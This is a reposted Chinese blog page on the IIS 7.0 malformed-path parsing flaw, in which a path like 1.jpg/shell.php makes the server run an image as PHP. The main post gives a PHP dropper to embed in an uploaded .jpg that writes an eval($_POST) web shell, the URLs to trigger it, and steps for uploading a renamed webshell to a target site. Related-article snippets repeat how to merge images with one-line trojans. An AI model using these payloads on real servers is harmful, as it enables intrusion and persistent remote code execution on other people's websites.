IIS7.0 畸形解析

最新推荐文章于 2023-05-07 00:21:43 发布
最新推荐文章于 2023-05-07 00:21:43 发布
阅读量213 收藏
点赞数
文章标签: php shell
原文链接:http://www.cnblogs.com/amwld/archive/2011/04/27/2030725.html
版权
1.jpg 内容
“<?fputs(fopen(“shell.PHP”,”w”),”<?eval(\$_POST[akt]);?>”)?>”


www.xxxx.com/upload/1.jpg
www.xxxx.com/upload/1.jpg/shell.php 访问后生成下面的一句话
www.xxxx.com/upload/shell.php



IIS7.0的畸形解析和这个类似。
找到某个使用IIS7.0架设的站,把PHP大马后缀改成.jpg,传上去,得到图片地址。
在图片格式后面添加xx.php随便你怎么填。只要后缀为.php就好.

转载于:https://www.cnblogs.com/amwld/archive/2011/04/27/2030725.html

weixin_30752377
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
通杀IIS7.0畸形解析0day漏洞(类似Nginx那个0day)
Yatere的天平秤
04-28 1950
 在群里看见许多大牛在周杰伦官方留页面 一群小菜四处宣传,实在没必要 渗透方法其实和网上并没有区别 大家可以网上看看 通杀IIS7.0畸形解析0day漏洞 先合并一张PHP一句话图片马,合并方法: ①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif ②、用edjpgcom,进行图片和一句话木马的合并, 图片随便找一张. 【
通杀IIS7.0畸形解析0day漏洞
weixin_30784141的博客
01-17 138
先合并一张PHP一句话图片马,合并方法: ①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif ②、用edjpgcom,进行图片和一句话木马的合并, 图片随便找一张. 【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到 edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代...
iis+php解析漏洞修复,IIS7.0畸形解析漏洞通杀0day
weixin_32761653的博客
03-12 262
IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0Nginx好像又爆0day了,windows下可任意查看和下载脚本文件 王猛 IIS7.0畸形解析0day通杀漏洞,和Nginx上次的0day一样。使用iis7.0的注意了。临时解决办法:关闭cgi.fix_pathinfo为0___________...
七夕咱一起验证漏洞✨ IIS7/7.5对文件名畸形解析导致远程代码执行❤️
LiBai'S BLOG
08-14 5070
漏洞复现 http://www.xxx.cn/statics/ghx/css/default1219.css/xx.php IIS 7/7.5在Fast-CGI运行模式下,如果在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。 利用方法 将一张图和一个写入后门代码的文本文件合并将恶意文本写入图片的二进制代码之后,避免破坏图片文件头和尾 e.g. copy xx.jpg/b + yy.txt/a xy.jpg ################
iis7.0.zip
08-04
IIS(Internet Information Services)7 指 Windows Server ...IIS 7.0 在 Windows Server 2008 中是 Web 服务器 (IIS) 角色,而在 Windows Vista 中是 Web 服务器。该版本为独立安装版本,解决了自带安装不成功的烦恼
IIS7.0适用Win7
05-01
IIS7.0简介】 IIS7.0(Internet Information Services 7.0)是微软发布的一款强大的Web服务器软件,适用于Windows 7操作系统。它提供了丰富的管理和开发环境,支持HTTP、HTTPS、FTP等多种网络协议,是搭建和管理...
IIS7.0 配置 PHP+MySQL
03-11
Windows Server 2008 IIS7.0 配置 PHP MySQL Zend phpMyadmin 教程,图文并茂,非常详细。 使用 Windows7 和 Windows Server 2008 下 IIS7.0 做网站的朋友可以参考一下。
iis7下载(微软Web服务器组件IIS7.0完整安装包) v7.0.zip
07-17
想知道下一代的微软Web服务器组件IIS 7.0是什么...如果您的服务器没有安装好IIS7,恰好手里有没有光碟,那么这个IIS 7.0 完整安装包(独立安装包)非常适合您,它同样也是一款完美的win7 iis7.0安装包,值得下载!!!
win7IIS7.0脚本安装文件
05-20
【win7IIS7.0脚本安装文件】是一个针对Windows 7操作系统的IIS(Internet Information Services)7.0的快速安装方案。这个压缩包包含了一个名为"win7iis7.0"的批处理(BAT)文件,用于简化IIS的安装过程,使得用户...
iis7 php漏洞,通杀IIS7.0畸形解析0day漏洞
weixin_39770226的博客
03-24 264
先合并一张PHP一句话图片马,合并方法:①、DOS合并:copy 1.gif /b + 1.txt/a asp.gif②、用edjpgcom,进行图片和一句话木马的合并,图片随便找一张.【顺带着说一下edjpgcom的使用方法:打开edjpgcom.exe所在文件夹,然后把你所要修改的图片拖动到edjpgcom.exe上面,然后edjpgcom.exe会自动打开,写入想要些的代码即可】一句话:...
上传漏洞 之 iis解析漏洞、asp解析漏洞、文件解析漏洞、畸形解析漏洞、Apache解析漏洞
永不垂头的博客
08-10 1403
上传漏洞 之 iis解析漏洞、asp解析漏洞、文件解析漏洞、畸形解析漏洞、Apache解析漏洞 一、iis解析漏洞 中间件:IIS NGINX APACHE WEBLOGIC JBOSS .NET PHP,JSP PHP,JSP JSP ASP,ASPX IIS解析漏洞 目录解析: www/ 5.x-6.0 /123.asp/ddd.txt/ss.jgp jgp 文件解析: .jpg txt格式 jsp xx.asp;.jpg xx.ph
IIS7.5文件解析漏洞&&Apache解析漏洞&&Nginx文件解析漏洞&&
最新发布
m0_73720136的博客
05-07 2329
掌握利用IIS7.5文件解析漏洞,绕过白名单限制,解析脚本文件。掌握利用Apache文件解析漏洞,绕过白名单限制,解析脚本文件。掌握利用Nginx文件解析漏洞,绕过白名单限制,解析脚本文件。
文件上传&解析漏洞
weixin_44926231的博客
08-13 1408
一、IIS 5.x/6.0解析漏洞(03) IIS 6.0解析利用方法有两种 1.目录解析 /xx.asp/xx.jpg 在网站下简历文件夹为.asp、.asa的文件夹,其目录内的任何文件扩展名的文件都会被IIS当做asp文件来执行 例如目录 hahaha.asp,那么/hahaha.asp/1.jpg 一个jpg格式的文件就会被当做asp脚本文件来解析执行,假设黑客可以控制问上传文件的文件夹路径...
文件解析漏洞总结
bring_coco的博客
12-11 633
1. IIS 5.x/6.0解析漏洞 (1)目录解析漏洞(.asp目录下所有后缀名的文件都被解析成.asp文件) 演示: 环境:Windows Server 2003(其中自带IIS服务) 环境搭建IIS步骤:开始–设置–控制面板–添加或删除程序–添加/删除组件–把应用程序服务勾起点详细信息把ASP.exe勾起,然后安装即可 最主要的是对IIS服务器的配置:打开IIS管理器–本机–网站–默认网站右键属性,得到如下图 在我搭建过程中,可以访问根目录下但无法访问根目录下的目录中的文件: 解决方法: 在IIS
中间件漏洞详解
10-26
本课程分别从iis5.x/6、iis7、apache三个中间件漏洞进行分析,首先从原理上介绍形成该漏洞的原因,而后通过实战的形式演示怎么利用这三种漏洞对服务器进行攻击。
IIS7&7.5解析漏洞
热门推荐
笨笨的专栏
07-06 5万+
IIS7/7.5在Fast-CGI运行模式下,在一个文件路径(/xx.jpg)后面加上/xx.php会将/xx.jpg/xx.php 解析为 php 文件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值